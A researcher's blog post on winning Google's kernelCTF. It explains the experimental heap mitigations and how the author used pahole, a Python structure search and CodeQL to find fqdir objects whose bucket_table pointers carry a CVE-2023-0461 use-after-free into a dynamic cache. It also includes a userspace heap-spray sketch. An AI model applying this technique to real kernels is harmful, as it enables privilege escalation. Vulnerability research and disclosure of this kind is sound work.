In 2023 Google launched a new Vulnerability Reward Program (VRP) called kernelCTF. I was fortunate enough to get first blood by compromising the instance with experimental mitigations.

In this article, after providing a brief overview of the mitigations, I will focus on the process I followed to identify the kernel objects used to compromise the system. Hopefully, this can be useful for those who are new to the field or are just curious about how certain unusual structures end up being utilized in kernel exploits.

The complete technical analysis of the exploit can be found in the Google Security Research repository.

The Path To Experimental Mitigations

In 2022, I participated in the kCTF Vulnerability Reward Program, and managed to compromise Google’s hardened Kubernetes infrastructure with a novel exploitation technique that can be utilized to perform privilege escalation with a single byte written out-of-bounds.

All the kernel exploits submitted during the year have been collected in the Kernel Exploit Recipes Notebook, a book created by sirdarkcat to document all the different techniques.

Kernel Exploit Recipes Notebook

Google engineers analyzed all the exploits and developed experimental mitigations with the intent to stop entire classes of attacks. They mainly focused on preventing elastic objects from being easily used to exploit vulnerabilities in the kernel heap, and on preventing cross-cache attacks.

All details about the mitigations can be found in the MITIGATION_README. Here I will provide you with a short description:

  • CONFIG_KMALLOC_SPLIT_VARSIZE aims to be the elastic object killer by separating dynamically sized structures from fixed-size objects: if the size of an object can be determined at compile time, the object is allocated in kmalloc slabs dedicated to fixed-size objects; otherwise, it is allocated in a slab for dynamic objects (see the sketch after this list). As a downside, when objects are separated into multiple caches, slabs tend to be less noisy, which increases exploit stability. Furthermore, if the vulnerable object is itself allocated in a cache containing dynamic objects, this mitigation actually facilitates the exploitation process.

  • CONFIG_SLAB_VIRTUAL is designed to stop cross-cache attacks. It allocates SLUB objects from a dedicated virtual memory region and ensures that slab virtual memory is never reused for a different slab. Optionally, it is also possible to add virtual guards between slabs. This protection is very effective, but it does not cover allocations above a certain size, as larger requests (> 8192 bytes) are passed directly to the page allocator.
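
To make the fixed/dynamic distinction concrete, here is a small hypothetical kernel-style sketch (mine, not taken from the mitigation patches): the first allocation has a compile-time-constant size and would be served from a regular fixed-size kmalloc cache, while the second depends on a runtime value and would be routed to a dyn-kmalloc cache.

/* Hypothetical illustration of the fixed/dynamic split described above. */
struct fixed_example {
	u64 a;
	u64 b;
};

void split_varsize_example(size_t runtime_len)
{
	/* sizeof(*obj) is a compile-time constant -> fixed-size kmalloc cache */
	struct fixed_example *obj = kzalloc(sizeof(*obj), GFP_KERNEL);

	/* runtime_len is only known at runtime -> dyn-kmalloc cache */
	char *buf = kzalloc(runtime_len, GFP_KERNEL);

	kfree(buf);
	kfree(obj);
}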

In 2023, Google launched a new VRP called kernelCTF, so I decided to participate, utilizing a vulnerability for which I had already written an exploit a short time before.

From UAF To PTSD

Some time before the launch of the new VRP, as an exercise, I wrote an exploit for CVE-2023-0461, a Use-After-Free vulnerability caused by a missing check in the ULP subsystem of the Linux kernel, exploitable through the TLS subsystem.

With the original exploit, I was able to perform privilege escalation on multiple Linux distributions with less than 200 lines of code, without requiring a leak or a ROP chain. So when Google launched the new VRP, I thought I could use it to compromise the instance with experimental mitigations.

Unfortunately for me, on that system it was a completely different story.

The bug I was trying to exploit was a Use-After-Free in kmalloc-512 that could easily be turned into a Double-Free. However, the object separation offered by CONFIG_KMALLOC_SPLIT_VARSIZE completely ruled out my original exploitation strategy, as the vulnerable object and the attacking objects were now allocated in separate caches, and with CONFIG_SLAB_VIRTUAL enabled, I could not use a cross-cache attack.

I won’t cover one day of failed attempts here, but I will mention that after one more unsuccessful attempt to cause a race condition in kmalloc-512 to overlap two linux_binprm objects and use the overlapped binprm->cred pointers to cause a UAF in cred_jar, I realized that I was on the right track; I only needed something slightly different.

The pointer overlapping approach was correct, but I needed to overlap two pointers to dynamic structures, making them point to the same object. This would have allowed me to easily transfer exploitation primitives from one cache to another, turning the UAF in kmalloc-512 into a UAF in the dynamic cache.

Looking For A Structure

Manually analyzing thousands of kernel structures (and nested structures) to find a field that satisfies certain properties can be a tedious task. So at that point, I could proceed in two ways:

  • The 1337 way: Write an advanced object analyzer in Rust integrated with CodeQL, capable of extracting structures from vmlinux using the DWARF format and automatically identifying exploitable objects.

  • The lazy way: Use pahole to dump all the kernel structures into a file and extend a Python library I wrote one year earlier to analyze kernel objects.

Aaand of course, I chose the second option: I used pahole to extract all the kernel structures from vmlinux:

pahole --suppress_aligned_attribute --suppress_packed --suppress_force_paddings --fixup_silly_bitfields --structs vmlinux > kernelctf-mitigation-structs

then, I extended libksp, a library I coded some time ago, to parse the pahole output and convert raw structures into Python objects. I added a deep_search() method to the Structure class to dig into nested structures and look for fields that satisfy certain conditions:

class Structure:

[...]

    def deep_search(self, ksp, path="", offset=0, condition=lambda member: False):
        path = self.get_name() if not path else path
        for member in self:
            current_path = f"{path}.{member.get_name()}"
            total_offset = offset + member.get_offset()
            # Recurse into structures embedded by value, accumulating their offset
            if not member.is_ptr() and member.is_struct():
                if nested_struct := ksp.get_struct(name=member.get_type_name()):
                    nested_struct.deep_search(ksp, current_path, total_offset, condition)
            # Report any member that satisfies the caller-provided condition
            elif condition(member):
                print(f"Found: {current_path}, Offset: {total_offset}, Type: {member.get_type_name()}")

[...]

At this point I only needed to code a function that returns True when certain conditions are met (is_ptr_to_dynamic_struct()) and loop through the structures, calling deep_search():

from libksp import KernelStructParser as KSP

ksp = KSP("./kernelctf-mitigation-structs")
structs = ksp.parse_structs()

def is_ptr_to_dynamic_struct(member):
    if member.is_ptr() and not member.is_fptr() and member.is_struct():
        if struct := ksp.get_struct(name=member.get_type_name()):
            if struct.is_dyn():
                return True
    return False

tls_context = ksp.get_struct(name="tls_context")
tls_context_cache = tls_context.get_cache() # kmalloc-512

# Scan fixed-size structures sharing kmalloc-512 with the vulnerable tls_context
for struct in structs:
    if not struct.is_dyn() and struct.get_cache() == tls_context_cache:
        struct.deep_search(ksp, condition=is_ptr_to_dynamic_struct)

The program returned many findings:

Found: srcu_struct.work.wq, Offset: 368, Type: workqueue_struct
Found: linux_binprm.mm, Offset: 16, Type: mm_struct
Found: bio_set.rescue_list.head, Offset: 320, Type: bio
Found: bio_set.rescue_list.tail, Offset: 328, Type: bio
Found: bio_set.rescue_workqueue, Offset: 368, Type: workqueue_struct
Found: fqdir.rhashtable.tbl, Offset: 64, Type: bucket_table
Found: netdev_queue.qdisc, Offset: 8, Type: Qdisc
Found: netdev_queue.qdisc_sleeping, Offset: 16, Type: Qdisc
Found: netdev_queue.pool, Offset: 120, Type: xsk_buff_pool
Found: kvm_page_track_notifier_head.track_srcu.work.wq, Offset: 368, Type: workqueue_struct
Found: intel_uncore_pmu.boxes, Offset: 352, Type: intel_uncore_box
Found: bpf_offloaded_map.map.kptr_off_tab, Offset: 56, Type: bpf_map_value_off
--- output cut here ---
[...]

One that caught my attention was the bucket_table pointer in fqdir.rhashtable.tbl.

Found: fqdir.rhashtable.tbl, Offset: 64, Type: bucket_table

fqdir contains a nested structure, rhashtable, rhashtable contains a pointer to a bucket_table object, and bucket_table is allocated in a dynamic cache. Exactly what I was looking for.

Here is the fqdir structure, followed by the nested structure rhashtable:

struct fqdir {
	long int                   high_thresh;          /*     0     8 */
	long int                   low_thresh;           /*     8     8 */
	int                        timeout;              /*    16     4 */
	int                        max_dist;             /*    20     4 */
	struct inet_frags *        f;                    /*    24     8 */
	struct net *               net;                  /*    32     8 */
	bool                       dead;                 /*    40     1 */
	struct rhashtable          rhashtable;           /*    64   136 */
	atomic_long_t              mem;                  /*   256     8 */
	struct work_struct         destroy_work;         /*   264    32 */
	struct llist_node          free_list;            /*   296     8 */

	/* size: 320, cachelines: 5, members: 11 */
	/* sum members: 225, holes: 2, sum holes: 79 */
	/* padding: 16 */
};

struct rhashtable {
	struct bucket_table *      tbl;                  /*     0     8 */
	unsigned int               key_len;              /*     8     4 */
	unsigned int               max_elems;            /*    12     4 */
	struct rhashtable_params   p;                    /*    16    40 */
	bool                       rhlist;               /*    56     1 */
	struct work_struct         run_work;             /*    64    32 */
	struct mutex               mutex;                /*    96    32 */
	spinlock_t                 lock;                 /*   128     4 */
	atomic_t                   nelems;               /*   132     4 */

	/* size: 136, cachelines: 3, members: 9 */
	/* sum members: 129, holes: 1, sum holes: 7 */
	/* last cacheline: 8 bytes */
};

And the bucket_table object, allocated in a dynamic cache (in our case dyn-kmalloc-1k):

struct bucket_table {
	unsigned int               size;                 /*     0     4 */
	unsigned int               nest;                 /*     4     4 */
	u32                        hash_rnd;             /*     8     4 */
	struct list_head           walkers;              /*    16    16 */
	struct callback_head       rcu;                  /*    32    16 */
	struct bucket_table *      future_tbl;           /*    48     8 */
	struct lockdep_map         dep_map;              /*    56     0 */
	struct rhash_lock_head *   buckets[];            /*    64     0 */

	/* size: 64, cachelines: 1, members: 8 */
	/* sum members: 52, holes: 2, sum holes: 12 */
};

At this point I only needed to know how the fqdir object was allocated, so I used pwnql, a CodeQL wrapper I wrote some time ago, to retrieve all the places where the object is allocated by the kernel. The program automatically generated a CodeQL query similar to:

import cpp
import utils

Type deref(Type t) {
	result = t.(DerivedType).getBaseType()
}

Type recursiveDeref(Type t) {
	t.getPointerIndirectionLevel() = 0 and result = t or
		t.getPointerIndirectionLevel() > 0 and
			result = recursiveDeref(deref(t))
}

class KmallocFunction extends Function {
	KmallocFunction() { 
		this.getName().regexpMatch("k[^_]*alloc[_a-z]*") or
			this.getName().matches("%kmemdup%") 
	}
}

class KmallocFunctionCall extends FunctionCall {
	KmallocFunctionCall() { 
		this.getTarget() instanceof KmallocFunction 
	}
}

class StructAllocatedByKmalloc extends Struct {
	KmallocFunctionCall kfc;
	StructAllocatedByKmalloc() { 
		this = recursiveDeref(kfc.getFullyConverted().getType())
	}
	KmallocFunctionCall getAFunctionCall() { 
		result = kfc
	}
}

from StructAllocatedByKmalloc structure
	where structure.getName().matches("%fqdir%")
		select structure.getLocation(),
    		"Struct=" + structure.getName() +
    		",AllocatedBy=" + structure.getAFunctionCall().getLocation() +
    		",Size=" + structure.getSize() +
    		",Cache=" + kmallocSlab(structure.getSize())

then, executing it returned the following result:

❯ pwnql alloc --struct fqdir

[+] Query 1: Search structures allocated by `k[^_]*alloc[_a-z]*` containing "fqdir" in name

[*] Result: 
 ╰─  Struct: fqdir
 ╰─  AllocatedBy: "https://elixir.bootlin.com/linux/v6.1/source/net/ipv4/inet_fragment.c#L188"
 ╰─  Size: 320
 ╰─  Cache: kmalloc-512

And indeed, if we read the net/ipv4/inet_fragment.c source code, we have:

int fqdir_init(struct fqdir **fqdirp, struct inet_frags *f, struct net *net)
{
	struct fqdir *fqdir = kzalloc(sizeof(*fqdir), GFP_KERNEL);
	int res;

	if (!fqdir)
		return -ENOMEM;
	fqdir->f = f;
	fqdir->net = net;
	res = rhashtable_init(&fqdir->rhashtable, &fqdir->f->rhash_params);
	if (res < 0) {
		kfree(fqdir);
		return res;
	}
	refcount_inc(&f->refcnt);
	*fqdirp = fqdir;
	return 0;
}

After some source code reading, I found that fqdir_init() is called by ipv4_frags_init_net(), ipv6_frags_init_net(), and by netfilter when a new network namespace is initialized. The bucket_table in the rhashtable structure is automatically allocated by bucket_table_alloc() when rhashtable_init() is called in fqdir_init().
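
For context, the allocation performed by bucket_table_alloc() in lib/rhashtable.c can be sketched roughly as follows (a paraphrase, not the verbatim kernel code): the size depends on the runtime number of buckets, which is why, under CONFIG_KMALLOC_SPLIT_VARSIZE, the object lands in a dynamic cache. With the default of 64 buckets, that comes to roughly 64 + 64 * 8 = 576 bytes, hence dyn-kmalloc-1k.

/* Simplified sketch of bucket_table_alloc(), lib/rhashtable.c (paraphrased) */
static struct bucket_table *bucket_table_alloc_sketch(size_t nbuckets, gfp_t gfp)
{
	/* sizeof(struct bucket_table) + one pointer per bucket: runtime-dependent */
	size_t size = sizeof(struct bucket_table) +
		      nbuckets * sizeof(struct rhash_lock_head *);

	return kvzalloc(size, gfp);
}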

To trigger the fqdir allocations, it is only necessary to create a new network namespace using unshare(CLONE_NEWNET). After a chain of calls (create_new_namespaces() -> copy_net_ns() -> setup_net()), setup_net() will initialize all the per-namespace network subsystems, and the fqdir objects will be allocated.

At this point, I was able to orchestrate multiple tasks and call unshare(CLONE_NEWNET) from each of them to allocate multiple fqdir objects, overlapping two of them in kmalloc-512 to cause a UAF in dyn-kmalloc-1k, thanks to the overlapped bucket_table pointers. Finally, I could transfer exploitation primitives from one cache to another, unlock dynamic objects and complete the exploitation process.
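
As an illustration, a minimal userspace sketch of this spray could look like the following (my own example, not the actual exploit code; it assumes unprivileged user namespaces are available, so each worker can enter a new user namespace before unsharing the network namespace, and the helper name and worker count are arbitrary):

#define _GNU_SOURCE
#include <sched.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/wait.h>

#define NUM_WORKERS 64

/* Each worker creates its own network namespace: setup_net() runs the
 * per-namespace init callbacks and fqdir objects land in kmalloc-512. */
static void spray_fqdir(void)
{
	/* A new user namespace grants the capabilities needed without root. */
	if (unshare(CLONE_NEWUSER | CLONE_NEWNET) < 0) {
		perror("unshare");
		exit(1);
	}
	pause(); /* keep the namespace, and its fqdir objects, alive */
}

int main(void)
{
	pid_t pids[NUM_WORKERS];

	for (int i = 0; i < NUM_WORKERS; i++) {
		pids[i] = fork();
		if (pids[i] == 0)
			spray_fqdir();
	}

	/* ... here the exploit would overlap two fqdir objects in kmalloc-512 ... */

	for (int i = 0; i < NUM_WORKERS; i++) {
		kill(pids[i], SIGKILL);
		waitpid(pids[i], NULL, 0);
	}
	return 0;
}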

All details about the exploit can be found in the Google Security Research repository.

Conclusion

In this brief blog post, I examined how Google’s experimental mitigations work and outlined the process I followed to identify the attacking objects used to compromise their hardened system. While these mitigations represent a significant advancement in kernel security, this analysis shows that vulnerabilities can still be exploited through unconventional approaches.

All the tools mentioned in this article are expected to be open-sourced in the near future.

Cheers!